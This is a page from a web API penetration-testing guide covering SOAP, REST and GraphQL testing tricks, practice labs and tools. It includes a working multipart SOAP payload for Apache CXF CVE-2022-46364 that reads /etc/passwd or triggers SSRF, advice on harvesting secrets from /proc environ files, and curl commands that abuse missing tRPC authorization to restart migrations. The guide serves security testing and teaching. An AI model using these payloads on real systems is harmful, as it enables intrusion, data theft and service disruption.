web-api-pentesting.md (11646B)
1 --- 2 title: "Web API Pentesting" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/web-api-pentesting.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/web-api-pentesting.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Web API Pentesting 14 15 ## API Pentesting Methodology Summary 16 17 Pentesting APIs involves a structured approach to uncovering vulnerabilities. This guide encapsulates a comprehensive methodology, emphasizing practical techniques and tools.<sup>[[1]](#references)</sup> 18 19 ### **Understanding API Types** 20 21 - **SOAP/XML Web Services**: WSDL describes services, operations, bindings, and endpoints and is often exposed through a `?wsdl` URL. Tools such as **SoapUI** and Burp's **Wsdler** extension can parse it and generate baseline requests. 22 - **REST-style HTTP APIs**: JSON is common but not required. Look for an **OpenAPI** document (`openapi.json`, `swagger.json`, `/api-docs`) and render it with Swagger UI or import it into an HTTP client. WADL exists but is far less common in current deployments.<sup>[[6]](#references)[[11]](#references)</sup> 23 - **GraphQL**: A query language for APIs offering a complete and understandable description of the data in your API. 24 25 ### **Practice Labs** 26 27 - [**VAmPI**](https://github.com/erev0s/VAmPI): A deliberately vulnerable API for hands-on practice, covering the OWASP top 10 API vulnerabilities. 28 - [**DNE Online Calculator**](http://www.dneonline.com/calculator.asmx): A public SOAP calculator whose `?WSDL` document is useful for practicing WSDL import and baseline request generation. It is a third-party demonstration service, not an intentionally vulnerable target, so keep testing to its documented operations.<sup>[[13]](#references)</sup> 29 30 ### **Effective Tricks for API Pentesting** 31 32 - **SOAP/XML Vulnerabilities**: Explore XXE vulnerabilities, although DTD declarations are often restricted. CDATA tags may allow payload insertion if the XML remains valid. 33 - **Privilege Escalation**: Test endpoints with varying privilege levels to identify unauthorized access possibilities. 34 - **CORS Misconfigurations**: Check whether untrusted origins can make credentialed requests **and read the response**. CORS and CSRF are related browser trust boundaries but are not interchangeable: CSRF can trigger a state change without response access, while exploitable CORS can expose response data to attacker-controlled JavaScript.<sup>[[7]](#references)</sup> 35 - **Endpoint Discovery**: Leverage API patterns to discover hidden endpoints. Tools like fuzzers can automate this process. 36 - **Parameter Tampering**: Experiment with adding or replacing parameters in requests to access unauthorized data or functionalities. 37 - **HTTP Method Testing**: Vary request methods (GET, POST, PUT, DELETE, PATCH) to uncover unexpected behaviors or information disclosures. 38 - **Content-Type Manipulation**: Switch between different content types (x-www-form-urlencoded, application/xml, application/json) to test for parsing issues or vulnerabilities. 39 - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing. 40 - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions. 41 42 ### Apache CXF MTOM/XOP `xop:Include` as file-read / SSRF primitive 43 44 If a SOAP service uses **Apache CXF** with **MTOM/XOP** enabled, test whether a parameter accepts an inline `xop:Include` element inside a **`multipart/related`** request whose root part is **`application/xop+xml`**. Apache's advisory for **CVE-2022-46364** states vulnerable versions parse the `href` of `XOP:Include` in MTOM requests and can perform SSRF-style fetches.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup> 45 46 Why this matters in practice: 47 48 - Many testers try only plain `text/xml` SOAP bodies and miss that the vulnerable code path is reached only after switching to **MIME multipart + XOP**. 49 - If the application **reflects** the affected parameter in the SOAP response, the SSRF primitive can become **arbitrary local file read** by using `file://`. 50 - Even without reflection, `http://`/`https://` targets can still be useful for **blind SSRF** against internal services. 51 52 Minimal structure to adapt to the target operation: 53 54 ```http 55 POST /service HTTP/1.1 56 Content-Type: multipart/related; type="application/xop+xml"; start="<root.message@cxf.apache.org>"; boundary="MIME_boundary" 57 58 --MIME_boundary 59 Content-Type: application/xop+xml; charset=UTF-8; type="text/xml" 60 Content-ID: <root.message@cxf.apache.org> 61 62 <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 63 xmlns:xop="http://www.w3.org/2004/08/xop/include"> 64 <soap:Body> 65 <ns:OPERATION xmlns:ns="http://target/"> 66 <ns:PARAM><xop:Include href="file:///etc/passwd"/></ns:PARAM> 67 </ns:OPERATION> 68 </soap:Body> 69 </soap:Envelope> 70 --MIME_boundary-- 71 ``` 72 73 Practical triage: 74 75 1. Identify CXF version from the JAR, error pages, banners, or decompiled service artifacts. 76 2. Generate a valid SOAP request first (`?wsdl`, SoapUI, Burp WSDLer, traced client, decompiled stubs). 77 3. Convert the request to **`multipart/related`** and replace a parameter value with `xop:Include`. 78 4. Test `file:///etc/passwd` for reflection-based reads and `http://<collaborator>` for SSRF. 79 80 After obtaining local file read, high-value targets often include: 81 82 - **systemd units** in `/etc/systemd/system/` and `/lib/systemd/system/` for `ExecStart=`, `EnvironmentFile=`, usernames, bind addresses, and credentials passed on the command line 83 - **`/proc/<pid>/cmdline`** to recover full launch arguments of interesting services 84 - **`/proc/<pid>/environ`** to recover secrets injected as environment variables 85 - service-specific config, env, or wrapper scripts referenced by the unit file 86 87 ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls 88 89 Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`.<sup>[[2]](#references)</sup> 90 91 - Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control). 92 - Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability. 93 - Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`. 94 95 Example vulnerable pattern (no role/permission gate): 96 97 ```text 98 // The endpoint for retrying a migration job 99 // This checks for a valid session (authentication) 100 retry: protectedProcedure 101 // but not for an admin role (authorization). 102 .input(z.object({ name: z.string() })) 103 .mutation(async ({ input, ctx }) => { 104 // Logic to restart a sensitive migration 105 }), 106 ``` 107 108 Practical exploitation (black-box) 109 110 1) Register a normal account and obtain an authenticated session (cookies/headers). 111 2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures. 112 113 ```bash 114 curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \ 115 -H 'Content-Type: application/json' \ 116 -b '<AUTH_COOKIES>' \ 117 --data '{"input":{}}' 118 ``` 119 120 3) Invoke privileged actions such as restarting a job: 121 122 ```bash 123 curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \ 124 -H 'Content-Type: application/json' \ 125 -b '<AUTH_COOKIES>' \ 126 --data '{"input":{"name":"<migration_name>"}}' 127 ``` 128 129 Impact to assess 130 131 - Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics). 132 - DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages. 133 134 ### **Tools and Resources for API Pentesting** 135 136 - **Kiterunner** discovers API routes and parameters using compiled route wordlists:<sup>[[8]](#references)</sup> 137 138 ```bash 139 kr scan https://domain.com/api/ -w routes-large.kite -x 20 140 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20 141 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0 142 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 143 ``` 144 145 - **sj** audits exposed Swagger/OpenAPI definitions for weak authentication and generates command templates for manual testing.<sup>[[9]](#references)</sup> 146 - **Postman** can import OpenAPI definitions from a file, URL, raw JSON/YAML, or a repository and generate a request collection, which is useful for preserving and replaying a discovered API surface.<sup>[[12]](#references)</sup> 147 - Additional tools like **automatic-api-attack-tool**, **Astra**, and **restler-fuzzer** offer tailored functionalities for API security testing, ranging from attack simulation to fuzzing and vulnerability scanning. 148 - **Cherrybomb** performs API-security checks from an OpenAPI Specification document.<sup>[[10]](#references)</sup> 149 150 ### **Learning and Practice Resources** 151 152 - **OWASP API Security Top 10**: Essential reading for understanding common API vulnerabilities ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)). 153 - **API Security Checklist**: A comprehensive checklist for securing APIs ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)). 154 - **Logger++ Filters**: For hunting API vulnerabilities, Logger++ offers useful filters ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)). 155 - **API Endpoints List**: A curated list of potential API endpoints for testing purposes ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)). 156 157 ## References 158 159 - [1] [API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) 160 - [2] [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) 161 - [3] [Apache CXF advisory for CVE-2022-46364](https://cxf.apache.org/security-advisories.data/CVE-2022-46364.txt) 162 - [4] [Apache CXF security advisories](https://cxf.apache.org/security-advisories.html) 163 - [5] [0xdf - HTB DevArea](https://0xdf.gitlab.io/2026/07/04/htb-devarea.html) 164 - [6] [OpenAPI Specification](https://spec.openapis.org/oas/latest.html) 165 - [7] [MDN - Cross-Origin Resource Sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS) 166 - [8] [Assetnote - Kiterunner](https://github.com/assetnote/kiterunner) 167 - [9] [BishopFox - sj](https://github.com/BishopFox/sj) 168 - [10] [BLST Security - Cherrybomb](https://github.com/blst-security/cherrybomb) 169 - [11] [Swagger UI](https://swagger.io/tools/swagger-ui/) 170 - [12] [Postman Docs – Integrate Postman with OpenAPI](https://learning.postman.com/docs/integrations/available-integrations/working-with-openAPI/) 171 - [13] [DNE Online - Calculator SOAP service](http://www.dneonline.com/calculator.asmx)